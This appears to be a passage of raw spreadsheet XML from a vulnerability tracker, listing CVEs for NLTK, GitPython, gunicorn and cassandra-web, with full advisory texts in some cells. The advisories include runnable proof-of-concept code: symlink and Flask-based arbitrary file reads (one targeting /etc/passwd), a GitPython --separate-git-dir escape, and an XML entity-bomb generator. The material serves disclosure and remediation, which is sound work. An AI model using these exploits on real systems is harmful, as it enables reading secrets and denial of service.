                outside = tmpdir / "outside"
                outside.mkdir()

                blocked_file = outside / "blocked.txt"
                blocked_file.write_text("blocked", encoding="utf-8")

                control_target = str(blocked_file)
                try:
                    with pathsec.open(control_target, "rb"):
                        raise AssertionError(
                            "pathsec.open unexpectedly allowed control path"
                        )
                except PermissionError:
                    print("control:pathsec.open=blocked")

                lin_root = tmpdir / "lin"
                lin_root.mkdir()
                lin_file = lin_root / "simN.lsp"
                lin_file.write_text(
                    '("business" (desc 1.0)\n\t"enterprise"\t0.9\n))\n',
                    encoding="utf-8",
                )

                opened = []
                real_open = builtins.open

                def tracking_open(*args, **kwargs):
                    opened.append(str(args[0]))
                    return real_open(*args, **kwargs)

                with patch("builtins.open", tracking_open):
                    LinThesaurusCorpusReader(str(lin_root))

                if any(p.endswith("simN.lsp") for p in opened):
                    print("lin:outside_root_open=success")
                else:
                    raise AssertionError("LinThesaurusCorpusReader did not open data")

                panlex_root = tmpdir / "panlex"
                panlex_root.mkdir()
                db_path = panlex_root / "db.sqlite"
                db = sqlite3.connect(db_path)
                cur = db.cursor()
                cur.execute("create table lv(uid text, lv text, lc text, tt text)")
                cur.execute("create table dnx(ex int, mn int, uq int, ap int, ui text)")
                cur.execute("create table ex(ex int, tt text, lv text, uq int)")
                cur.execute(
                    "insert into lv(uid, lv, lc, tt) values ('u1', 'lv1', 'en', 'English')"
                )
                db.commit()
                db.close()

                reader = PanLexLiteCorpusReader(str(panlex_root))
                result = reader.language_varieties()
                if result == [("u1", "English")]:
                    print("panlex:language_varieties=success")
                else:
                    raise AssertionError("PanLexLiteCorpusReader did not load data")

    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

Expected output:

```
control:pathsec.open=blocked
lin:outside_root_open=success
panlex:language_varieties=success
```
## Impact

A caller can make NLTK read filesystem content outside the intended NLTK data sandbox through public corpus-reader constructors. In the PoC, that includes a local text file and a local SQLite db.

## Severity

- Base Score: 7.5 (High)
- Severity reasoning:
  The bug is reliably triggerable by caller-controlled path input and exposes data outside the intended trust boundary; no special privileges are needed inside the process.

## Remediation

Validate raw string roots before constructing readers, and route all corpus-root/path handling through `pathsec` or a validated `PathPointer`. Remove direct builtin `open()` and direct `sqlite3.connect(os.path.join(...))` use on constructor-derived paths.</t></is></c><c r="S15" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t></is></c></row><row r="16"><c r="A16" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B16" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C16" s="5" t="inlineStr"><is><t>CVE-2018-1000164</t></is></c><c r="D16" s="5" t="n"><v>8.699999999999999</v></c><c r="E16" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F16" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G16" s="5" t="inlineStr" /><c r="H16" s="5" t="n"><v>0.024</v></c><c r="I16" s="5" t="inlineStr" /><c r="J16" s="5" t="inlineStr" /><c r="K16" s="5" t="inlineStr" /><c r="L16" s="5" t="inlineStr"><is><t>pip:gunicorn</t></is></c><c r="M16" s="5" t="inlineStr"><is><t>19.5.0</t></is></c><c r="N16" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O16" s="5" t="inlineStr" /><c r="P16" s="5" t="inlineStr" /><c r="Q16" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R16" s="5" t="inlineStr"><is><t>gunicorn version 19.4.5 contains a CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers vulnerability in "process_headers" function in "gunicorn/http/wsgi.py" that can result in an attacker causing the server to return arbitrary HTTP headers. This vulnerability appears to have been fixed in 19.5.0.</t></is></c><c r="S16" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2018-1000164</t></is></c></row><row r="17"><c r="A17" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B17" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C17" s="5" t="inlineStr"><is><t>CVE-2020-36939</t></is></c><c r="D17" s="5" t="n"><v>8.699999999999999</v></c><c r="E17" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F17" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G17" s="5" t="inlineStr" /><c r="H17" s="5" t="n"><v>0.026</v></c><c r="I17" s="5" t="inlineStr" /><c r="J17" s="5" t="inlineStr" /><c r="K17" s="5" t="inlineStr" /><c r="L17" s="5" t="inlineStr"><is><t>rubygems:cassandra-web</t></is></c><c r="M17" s="5" t="inlineStr" /><c r="N17" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O17" s="5" t="inlineStr" /><c r="P17" s="5" t="inlineStr" /><c r="Q17" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R17" s="5" t="inlineStr"><is><t>Cassandra Web 0.5.0 contains a directory traversal vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating path traversal parameters. Attackers can exploit the disabled Rack::Protection module to read sensitive system files like /etc/passwd and retrieve Apache Cassandra database credentials.</t></is></c><c r="S17" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2020-36939</t></is></c></row><row r="18"><c r="A18" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B18" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C18" s="5" t="inlineStr"><is><t>CVE-2026-62384</t></is></c><c r="D18" s="5" t="n"><v>8.699999999999999</v></c><c r="E18" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F18" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G18" s="5" t="inlineStr" /><c r="H18" s="5" t="n"><v>0.006</v></c><c r="I18" s="5" t="inlineStr" /><c r="J18" s="5" t="inlineStr" /><c r="K18" s="5" t="inlineStr" /><c r="L18" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M18" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N18" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O18" s="5" t="inlineStr" /><c r="P18" s="5" t="inlineStr" /><c r="Q18" s="5" t="inlineStr"><is><t>CWE-22, CWE-59</t></is></c><c r="R18" s="5" t="inlineStr"><is><t>This is a **new, distinct vulnerability**: a bypass of the fix already published as [GHSA-xh95-f55m-82fw](https://github.com/nltk/nltk/security/advisories/GHSA-xh95-f55m-82fw) ("Path traversal in NLTK FramenetCorpusReader.frame() allows arbitrary XML file read, bypassing the nltk.pathsec sandbox"), not a duplicate of it.

## Summary

The original advisory was fixed (PR [#3581](https://github.com/nltk/nltk/pull/3581)) by adding `_reject_unsafe_path_component()`, which blocks literal `/`, `\`, `..`, and Windows drive prefixes in caller-/corpus-supplied names. It never resolves symlinks. All three call sites that use this guard still resolve the resulting path through `self.abspath()` (`nltk/corpus/reader/api.py`, `self._root.join(fileid)`), which is a plain lexical join, not the symlink-resolving, `required_root`-scoped check that `CorpusReader.open()` (and `NKJPCorpusReader`'s own fix for its sibling advisory) correctly use elsewhere in this same codebase.

A symlink placed inside the corpus's own subdirectory, with a name containing no separators at all, passes the guard cleanly and reads a file completely outside the corpus root.

## Affected code (`nltk/corpus/reader/framenet.py`)

- `frame_by_name()` reads `&lt;frame_dir&gt;/&lt;name&gt;.xml`
- `_lu_file()` reads `&lt;lu_dir&gt;/lu&lt;id&gt;.xml`
- `doc()` reads `&lt;fulltext_dir&gt;/&lt;filename&gt;`

All three follow the same chain: `_reject_unsafe_path_component(value, ...)`, then `self.abspath(os.path.join(subdir, value))`, then `XMLCorpusView(...)`, opened via `PathPointer.open()` with no `required_root`.

## Proof of concept

Self-contained, runnable end to end.

```python
import os
import tempfile

from nltk.corpus.reader.framenet import FramenetCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "framenet_v17")
frame_dir = os.path.join(corpus_root, "frame")
secret_dir = os.path.join(root, "outside_framenet_root")
os.makedirs(frame_dir)
os.makedirs(secret_dir)

with open(os.path.join(corpus_root, "frRelation.xml"), "w") as f:
    f.write("&lt;frameRelations/&gt;")

secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write(
        '&lt;frame cBy="000" cDate="01/01/2000" name="StolenFrame" ID="999999"&gt;'
        "&lt;definition&gt;THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT&lt;/definition&gt;"
        "&lt;/frame&gt;"
    )

# Attacker plants this inside &lt;corpus_root&gt;/frame/. No path separators,
# so it passes _reject_unsafe_path_component cleanly.
link_path = os.path.join(frame_dir, "evil_link.xml")
os.symlink(secret_path, link_path)

reader = FramenetCorpusReader(corpus_root, [])
reader._frame_idx = {"__dummy__": {"name": "__dummy__"}}  # skip unrelated index build

result = reader.frame_by_name("evil_link")   # normal, routine call, no ".." anywhere
print("frame name:", result["name"])
print("definition:", result["definition"])
```

Actual output when run against unpatched `main` (commit `35813c8`):

```
frame name: StolenFrame
definition: THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT
```

That content was read from `secret_path`, a file entirely outside `corpus_root`, via a single, unmodified, public API call. No exception is raised anywhere in the chain; `_reject_unsafe_path_component` passes because `"evil_link"` contains no separators, `..`, or drive prefix.

Verified the same way for the other two affected call sites, `_lu_file()` (`lu&lt;id&gt;.xml` symlink under `lu/`) and `doc()` (arbitrary filename symlink under `fulltext/`), both succeeding identically with no exception raised.
## Why this is in scope

- No malicious file for a victim to open, no special user interaction. Just a tampered/shared corpus directory (NLTK's own `SECURITY.md` names "shared environments... multi-tenant pipelines" as its threat model) plus a completely normal API call.
- Core corpus-reader code, not a demo/GUI tool.
- Confirmed unintentional: PR #3581's own description states the goal was to route through "the `nltk.pathsec` sandbox... including the strict `ENFORCE=True` mode" and be "consistent with the validation already used elsewhere in NLTK." It doesn't achieve that, since `abspath()` never reaches the scoped, symlink-resolving check that exists and is used correctly elsewhere in the same file tree (`NKJPCorpusReader`).

## Suggested fix

Route all three call sites through `CorpusReader.open()` (or pass `required_root=self._root` to `validate_path()` directly, as `NKJPCorpusReader` already does), instead of `self.abspath()` plus raw `PathPointer.open()`.</t></is></c><c r="S18" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t></is></c></row><row r="19"><c r="A19" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B19" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C19" s="5" t="inlineStr"><is><t>CVE-2026-63312</t></is></c><c r="D19" s="5" t="n"><v>8.699999999999999</v></c><c r="E19" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F19" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G19" s="5" t="inlineStr" /><c r="H19" s="5" t="n"><v>0.006</v></c><c r="I19" s="5" t="inlineStr" /><c r="J19" s="5" t="inlineStr" /><c r="K19" s="5" t="inlineStr" /><c r="L19" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M19" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N19" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O19" s="5" t="inlineStr" /><c r="P19" s="5" t="inlineStr" /><c r="Q19" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R19" s="5" t="inlineStr"><is><t>## Summary
Setting `nltk.pathsec.ENFORCE = True` is documented to sandbox all file access to allowed NLTK data directories and raise `PermissionError` on unauthorized access. However, `StreamBackedCorpusView` opens files via `builtins.open()` directly, bypassing `pathsec.validate_path()` entirely. An attacker who can influence the `fileid` argument can read arbitrary local files regardless of the `ENFORCE` setting.

## Details
`nltk/pathsec.py:274` defines the enforcement point:
```python
def open(file, mode="r", **kwargs):
    validate_path(file, context="pathsec.open")
    return builtins.open(file, mode=mode, **kwargs)
```

`StreamBackedCorpusView._open()` in `nltk/corpus/reader/util.py` bypasses this entirely for string paths:

```python
# line 171 — no validate_path() call
self._eofpos = os.stat(self._fileid).st_size

# line 208 — calls builtins.open directly
self._stream = open(self._fileid, "rb")
```

Also affected: `XMLCorpusView` and any corpus reader subclass that passes a raw string `fileid` to `StreamBackedCorpusView`.

## PoC
```python
# poc_server.py — StreamBackedCorpusView pathsec.ENFORCE bypass
from flask import Flask, request, jsonify
import nltk.pathsec as ps
from nltk.corpus.reader.util import StreamBackedCorpusView, read_line_block

# Strict mode enabled — expected to sandbox all file access
ps.ENFORCE = True

app = Flask(__name__)

@app.post("/read")
def read_file():
    fname = request.json.get("file")
    # fileid is user-controlled, passed directly to StreamBackedCorpusView
    # pathsec.ENFORCE = True is ignored — builtins.open() called internally
    view = StreamBackedCorpusView(fname, read_line_block, encoding="utf8")
    return jsonify({"file": fname, "content": view[0]})

app.run(host="0.0.0.0", port=8000)
```
Trigger:
```
curl -s -X POST http://localhost:8000/read \
  -H "Content-Type: application/json" \
  -d '{"file": "/etc/passwd"}'
```
Confirmed on latest stable NLTK. No privileges required.

## Impact
- **Type:** Arbitrary Local File Read / Security Control Bypass
- **CWE:** CWE-22, CWE-284
- **OWASP:** A01:2021 – Broken Access Control

Affects web apps, REST APIs, and multi-tenant NLP pipelines where user input influences the `fileid` passed to NLTK corpus readers. Sensitive targets include `/etc/passwd`, `/proc/self/environ` (may contain `AWS_SECRET_ACCESS_KEY`, `DATABASE_URL`, etc.), and application config files.

The core issue is that operators who explicitly set `ENFORCE = True` to harden production deployments are left with a **false security guarantee**.

**Suggested fix:** Replace `builtins.open()` and `os.stat()` in the string-path branch with `nltk.pathsec.open()` and `nltk.pathsec.validate_path()`.</t></is></c><c r="S19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t></is></c></row><row r="20"><c r="A20" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B20" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C20" s="5" t="inlineStr"><is><t>CVE-2026-78677</t></is></c><c r="D20" s="5" t="n"><v>8.699999999999999</v></c><c r="E20" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F20" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G20" s="5" t="inlineStr" /><c r="H20" s="5" t="n"><v>0.004</v></c><c r="I20" s="5" t="inlineStr" /><c r="J20" s="5" t="inlineStr" /><c r="K20" s="5" t="inlineStr" /><c r="L20" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M20" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N20" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O20" s="5" t="inlineStr" /><c r="P20" s="5" t="inlineStr" /><c r="Q20" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="R20" s="5" t="inlineStr"><is><t>- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the "escapes intended base directory" sense)
- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).

`git clone` also accepts `--separate-git-dir=&lt;path&gt;`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: &lt;path&gt;`) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *"Redirects the repository metadata to a caller-controlled path"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:

```
:param allow_unsafe_options:
    Allow unsafe options to be used, such as ``--template`` and
    ``--separate-git-dir``.
```

i.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:

```python
unsafe_git_clone_options = [
    "--upload-pack",
    "-u",
    "--config",
    "-c",
    "--template",
    "--bundle-uri",
]
```

So any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.

## Root cause
Parity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same "denylist omits an equally-dangerous sibling option" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).

## Exploit path
1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `"separate-git-dir"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.
2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.
3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=&lt;attacker path&gt;` and GitPython executes `git clone -v --separate-git-dir=&lt;attacker path&gt; -- &lt;url&gt; &lt;dest&gt;` via `subprocess` (no shell).
4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.

## Impact
Arbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` ("Arbitrary Git Repository Creation Outside the Working Tree", CVSS 8.2). Concretely:
- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.
- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.
- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.

## Preconditions
- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.
- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.

## Evidence
- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `"--separate-git-dir"` with the comment "Redirects the repository metadata to a caller-controlled path".
- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `"--separate-git-dir"`.
- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.
- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.
- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.

## False-positive check (adversarial re-read)
- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).
- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.
- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.
- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.
- Verdict: no concrete blocker found. **CONFIRMED.**

## Remediation
Add `"--separate-git-dir"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.

## Confidence
High. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.


## Proof-of-Concept source (`gitpython-001-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in
unsafe_git_clone_options, so it reaches `git clone` unguarded and writes a
full git directory (config, hooks/, objects/, refs/, ...) to an
attacker-controlled path OUTSIDE the intended destination directory, with
allow_unsafe_options left at its default of False.

Run against the GitPython source tree under test, e.g.:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-001-poc.py &lt;workdir&gt;

Benign: only writes/reads inside the given workdir. No destructive/exfiltrating
payload. Exits non-zero and prints "NOT VULNERABLE" if the guard blocks the option
or the write does not escape the destination directory.
"""
import os
import sys
import subprocess


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-001-poc"
    src = os.path.join(workdir, "src")
    dest = os.path.join(workdir, "dest")
    sentinel_dir = os.path.join(workdir, "OUTSIDE_SENTINEL")
    target_gitdir = os.path.join(sentinel_dir, "redirected.git")

    for p in (src, dest, sentinel_dir):
        os.makedirs(p, exist_ok=True)

    # Minimal benign source repo to clone from.
    subprocess.run(["git", "init", "-q", "-b", "main", src], check=True)
    subprocess.run(["git", "-C", src, "config", "user.email", "test@example.com"], check=True)
    subprocess.run(["git", "-C", src, "config", "user.name", "Test"], check=True)
    with open(os.path.join(src, "file.txt"), "w") as f:
        f.write("hello\n")
    subprocess.run(["git", "-C", src, "add", "file.txt"], check=True)
    subprocess.run(["git", "-C", src, "commit", "-q", "-m", "init"], check=True)

    import git  # gitpython under test

    print("unsafe_git_clone_options =", git.Repo.unsafe_git_clone_options)
    assert "--separate-git-dir" not in git.Repo.unsafe_git_clone_options, (
        "guard now includes --separate-git-dir; PoC no longer applicable, target patched"
    )

    try:
        repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)
    except git.exc.UnsafeOptionError as e:
        print("NOT VULNERABLE: blocked by UnsafeOptionError:", e)
        sys.exit(1)

    wrote_outside = os.path.isdir(os.path.join(target_gitdir, "hooks")) and os.path.isfile(
        os.path.join(target_gitdir, "config")
    )
    gitlink_points_outside = False
    with open(os.path.join(dest, ".git")) as f:
        gitlink = f.read().strip()
        gitlink_points_outside = target_gitdir in gitlink

    print("repo.git_dir =", repo.git_dir)
    print("wrote git directory outside dest (sentinel) =", wrote_outside)
    print("dest/.git gitlink points outside dest =", gitlink_points_outside)

    if wrote_outside and gitlink_points_outside:
        print("VULNERABLE: git directory created at attacker-controlled path "
              f"outside the clone destination: {target_gitdir}")
        sys.exit(0)
    else:
        print("NOT VULNERABLE: sentinel not observed")
        sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="S20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t></is></c></row><row r="21"><c r="A21" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B21" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C21" s="5" t="inlineStr"><is><t>CVE-2026-78681</t></is></c><c r="D21" s="5" t="n"><v>8.699999999999999</v></c><c r="E21" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F21" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G21" s="5" t="inlineStr" /><c r="H21" s="5" t="n"><v>0.003</v></c><c r="I21" s="5" t="inlineStr" /><c r="J21" s="5" t="inlineStr" /><c r="K21" s="5" t="inlineStr" /><c r="L21" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M21" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N21" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O21" s="5" t="inlineStr" /><c r="P21" s="5" t="inlineStr" /><c r="Q21" s="5" t="inlineStr"><is><t>CWE-776</t></is></c><c r="R21" s="5" t="inlineStr"><is><t>Several XML parsing sites in NLTK still used `xml.etree.ElementTree` directly, which honours `&lt;!ENTITY&gt;` declarations in a document's internal DTD subset. A crafted document a few hundred bytes long can expand to megabytes in memory (each nesting level multiplies by ten), a denial-of-service.

Affected call sites (&lt;= 3.10.2):
- `nltk.chunk.named_entity.load_ace_file` — parses ACE annotation XML
- `nltk.internals.ElementWrapper` — converts any given string to an Element
- `nltk.downloader` — `Package.fromxml`, `Collection.fromxml`, `_find_collections`, `_find_packages`

libexpat 2.6.0 added an input-amplification cap, but it only engages above an activation threshold (~8 MiB output) and depends on whichever libexpat the interpreter links; builds against older libexpat have no cap at all. External entities are not resolved by ElementTree, so this is a memory-amplification DoS (CWE-776), not XXE/file disclosure.

This completes the earlier defusedxml adoption that these sites were missed by. Fix routes all of them through a new `nltk.xmlsec` module that refuses entity declarations, preferring `defusedxml` and falling back to a standard-library `xml.parsers.expat` pre-scan when defusedxml is absent.

---

## Attack demonstration

Reproducible PoC against a real affected entry point (`nltk.internals.ElementWrapper`). Every number below is captured output, not illustrative.

### 1. The amplification (vulnerable path: raw `xml.etree.ElementTree`)

A payload of a few hundred bytes expands to megabytes in memory. Each nesting level multiplies output by 10 while adding ~56 bytes of input:

| levels | input bytes | expanded bytes | factor |
|--------|-------------|----------------|--------|
| 3 | 218 | 10,000 | x45 |
| 4 | 274 | 100,000 | x364 |
| 5 | 330 | 1,000,000 | x3,030 |
| 6 | 386 | (libexpat 2.7.1 cap trips) | - |

The level-6 cap is **libexpat's**, not NLTK's: it only engages above an ~8 MiB activation threshold, and older libexpat builds (still shipped with many 3.10/3.11 interpreters) have no cap at all. Under the threshold — up to ~1 MB per parse here — expansion always succeeds.

```python
import xml.etree.ElementTree as ET
def bomb(levels):
    d = "\n".join(f'&lt;!ENTITY e{i} "{("&amp;e%d;"%(i-1))*10}"&gt;' for i in range(1, levels+1))
    return f'&lt;!DOCTYPE d [&lt;!ENTITY e0 "AAAAAAAAAA"&gt;{d}]&gt;&lt;d&gt;&amp;e{levels};&lt;/d&gt;'
ET.fromstring(bomb(5))   # -&gt; element whose .text is 1,000,000 chars
```

### 2. The patched entry point rejects it

```
&gt;&gt;&gt; from nltk.internals import ElementWrapper
&gt;&gt;&gt; ElementWrapper(bomb(5))
EntitiesForbidden: EntitiesForbidden(name='e0', ...)
```

### 3. Why a text-based screen is not enough

An entity declaration can hide behind a decoy `&lt;!DOCTYPE&gt;` in a prolog comment. Raw ElementTree still processes the real declaration and expands; a guard that walks the DOCTYPE text is fooled. The shipped guard re-parses with expat, so it is not:

```python
evil = '&lt;!-- &lt;!DOCTYPE x [ ] &gt; --&gt;&lt;!DOCTYPE d [&lt;!ENTITY a "PPPP..."&gt;]&gt;&lt;d&gt;&amp;a;&lt;/d&gt;'
```

```
raw ElementTree -&gt; EXPANDS ('PPPPPPPPPPPP...', 40 chars)
nltk.xmlsec     -&gt; REJECTED (EntitiesForbidden)
```

An earlier draft of the fallback that walked the text **was** bypassed by this and 4 similar payloads (decoy DOCTYPE in a PI, stray `]` inside a PI in the internal subset). All five are now regression tests.

### 4. Both back ends block it

`nltk.xmlsec` prefers `defusedxml` and falls back to a stdlib `xml.parsers.expat` pre-scan. Same payloads, defusedxml hidden to force the fallback:

```
stdlib fallback | billion-laughs               -&gt; REJECTED (EntitiesForbidden)
stdlib fallback | comment-decoy differential   -&gt; REJECTED (EntitiesForbidden)
```

